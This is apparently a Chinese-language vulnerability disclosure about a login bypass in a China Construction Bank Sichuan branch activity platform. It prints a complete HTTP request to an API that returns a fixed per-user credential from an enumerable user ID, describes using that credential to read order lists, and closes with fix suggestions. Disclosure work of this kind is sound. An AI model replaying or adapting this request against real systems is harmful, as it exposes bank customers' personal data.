惠美四川存在登录绕过漏洞

惠美四川存在登录绕过漏洞

背景

“惠美四川”是中国建设银行四川省分行开发的活动平台,可以在建行生活App、微信中登录。

漏洞详情

“惠美四川”有一个查询根据用户ID(Pltfrm_Usr_ID)查询用户身份信息的API: /cnmsmp/branch/distributing/v1/queryUsrInfByPltfrmInfV2P1 ,返回的数据中包含了调用其他API的凭证信息(Prvt_Ctrct_ID)。

Pltfrm_Usr_ID是建行生活APP的用户ID,存在一定规律,可以生成一批Pltfrm_Usr_ID进行碰撞。

image-20221130122534528

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /cnmsmp/branch/distributing/v1/queryUsrInfByPltfrmInfV2P1 HTTP/2
Host: lsjr.ccb.com
Content-Length: 192
User-Agent: Mozilla/5.0 (Linux; Android 10; M2007J3SC Build/QKQ1.200419.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.101 Mobile Safari/537.36/CloudMercWebView
Content-Type: application/json
Accept: */*
Origin: https://scqy.ccb.com
X-Requested-With: com.ccb.longjiLife
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://scqy.ccb.com/hmscmob/index?ccbParamSJ=SC9OOGxjMGVUMDFydmE2eng2VmplNEVaSytpSnBNWHFRdXdiRTEyeHlNeW5Qb2IwNEprYkM4Rm1xNWI5b0Z0UXF2NTFwbmV4a0tSKytpK3FxWGdqOVUyM1RrZjZpdy80eE5iNzV6a0M4eUhIT2YyVHU4NHVYM1Z3NlJjTmhWWi9nYlQvaldnOEVvSkZSbmgzdDRXSU13RjIvbk1QZk5lY0YvemhyUnNOMnlGVk42cVI1QU93dGc0RGMzaWlDSWdMWlhIWWg1eFNWcHlqaWJZSk80R0IzbU5zVnN5NjZqeVVIN0lzaGRFK3RFVUJodGh4TzNWWm9seVJ3ZzhESUVxZ1BiWnptM3h4U0U1bkVhZWI5dlZJOWQ5YXR2Sk9WN1RIbmF1a1E4WUlHd1F4NENITUZpeC9icFc4ZzkyYW5DcVNOZ2hDN1RKRi9RMi8rYkxxMGN5Wk9BPT0=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

{"Jssdk_Version":"2.3.3","AuthCD":"ol14Gmyy3xdgk8ZQh1zX5hNLGVyGTcpU","AuthUrlCD":"1ux3Ey5nZUIy9XdCJ19kkeUr666vl1Zq","Pltfrm_TpCd":"3","Pltfrm_Usr_ID":"YSM202207179882457","pltfrmUnionId":null}

image-20221130134923938

使用获取的凭证(Prvt_Ctrct_ID)调用订单列表API:

image-20221130135517152

修复建议

  1. 与建行生活协商更换Pltfrm_Usr_ID生成方式
  2. 经测试,Prvt_Ctrct_ID每个用户都是固定的,不应将固定的Prvt_Ctrct_ID作为API 凭证使用,应在用户登录时随机生成一个token。